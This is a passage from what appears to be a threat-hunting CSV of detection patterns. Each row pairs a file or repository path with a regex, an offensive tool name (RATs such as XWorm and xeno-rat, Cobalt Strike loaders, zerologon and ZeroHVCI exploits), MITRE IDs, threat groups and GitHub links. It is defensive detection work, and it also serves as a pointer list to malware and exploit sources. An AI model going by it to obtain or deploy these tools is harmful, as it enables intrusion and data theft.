Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","12762"
"*/xeno-rat.git*",".{0,1000}\/xeno\-rat\.git.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","12763"
"*/XHVNC.exe*",".{0,1000}\/XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12764"
"*/XiebroC2.git*",".{0,1000}\/XiebroC2\.git.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","12765"
"*/XiebroC2/releases/download/*",".{0,1000}\/XiebroC2\/releases\/download\/.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","12766"
"*/xml_attack.txt*",".{0,1000}\/xml_attack\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12767"
"*/xml_attacks.txt*",".{0,1000}\/xml_attacks\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12768"
"*/xmlrpc-methods.nse*",".{0,1000}\/xmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12769"
"*/xmpp-brute.nse*",".{0,1000}\/xmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12770"
"*/xmpp-info.nse*",".{0,1000}\/xmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12771"
"*/xndpxs/CVE-2022-0847*",".{0,1000}\/xndpxs\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/xndpxs/CVE-2022-0847","1","1","N/A","N/A","N/A","1","9","7","2022-03-07T17:59:12Z","2022-03-07T17:51:02Z","12775"
"*/xor/stager.txt*",".{0,1000}\/xor\/stager\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","12776"
"*/xor/xor.go*",".{0,1000}\/xor\/xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","12777"
"*/XOR_b64_encrypted/*",".{0,1000}\/XOR_b64_encrypted\/.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","12778"
"*/XorObfuscation.cs*",".{0,1000}\/XorObfuscation\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","12779"
"*/xpath_injection.txt*",".{0,1000}\/xpath_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12780"
"*/XpertRAT.exe*",".{0,1000}\/XpertRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12781"
"*/xPipe/*",".{0,1000}\/xPipe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","1","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","12782"
"*/xRAT 2.exe*",".{0,1000}\/xRAT\s2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12783"
"*/xrat-master/*",".{0,1000}\/xrat\-master\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12784"
"*/XRulez binaries.zip*",".{0,1000}\/XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","12785"
"*/XRulez.exe*",".{0,1000}\/XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","12786"
"*/XRulez.zip*",".{0,1000}\/XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","12787"
"*/xss_robertux.txt*",".{0,1000}\/xss_robertux\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12788"
"*/XtremeRat.exe*",".{0,1000}\/XtremeRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Molerats - Packrat - TA558","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12789"
"*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","N/A","10","","N/A","","","","12790"
"*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12791"
"*/XWorm.rar*",".{0,1000}\/XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","#linux","N/A","10","","N/A","","","","12792"
"*/XWorm.zip*",".{0,1000}\/XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12793"
"*/XWorm-RAT-V*",".{0,1000}\/XWorm\-RAT\-V.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12794"
"*/xxe_fuzz.txt*",".{0,1000}\/xxe_fuzz\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12795"
"*/yanghaoi/_CNA*",".{0,1000}\/yanghaoi\/_CNA.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","12799"
"*/ysoserial.jar*",".{0,1000}\/ysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","12800"
"*/ysoserial/*",".{0,1000}\/ysoserial\/.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","12801"
"*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/2HZG41Zw\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12806"
"*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/2HZG41Zw\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12807"
"*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*",".{0,1000}\/zejius\/5GPR0iy9\/6Vtmo6w4yQ5tnsBHms64\.php.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12808"
"*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*",".{0,1000}\/zejius\/5GPR0iy9\/fJsnC6G4sFg2wsyn4shb\.bin.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","12809"
"*/ZeroHVCI.exe*",".{0,1000}\/ZeroHVCI\.exe.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","1","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","12810"
"*/ZeroHVCI.git*",".{0,1000}\/ZeroHVCI\.git.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","1","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","12811"
"*/zerologon.cna*",".{0,1000}\/zerologon\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","12812"
"*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","12813"
"*/zerologon.py*",".{0,1000}\/zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12814"
"*/zhzyker/CVE-2020-5902*",".{0,1000}\/zhzyker\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/zhzyker/CVE-2020-5902/","1","0","#linux","N/A","N/A","1","13","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z","12815"
"*/ZipExec -*",".{0,1000}\/ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","12816"
"*/ZipExec.git*",".{0,1000}\/ZipExec\.git.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","12817"
"*/ZipExec@latest*",".{0,1000}\/ZipExec\@latest.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","12818"
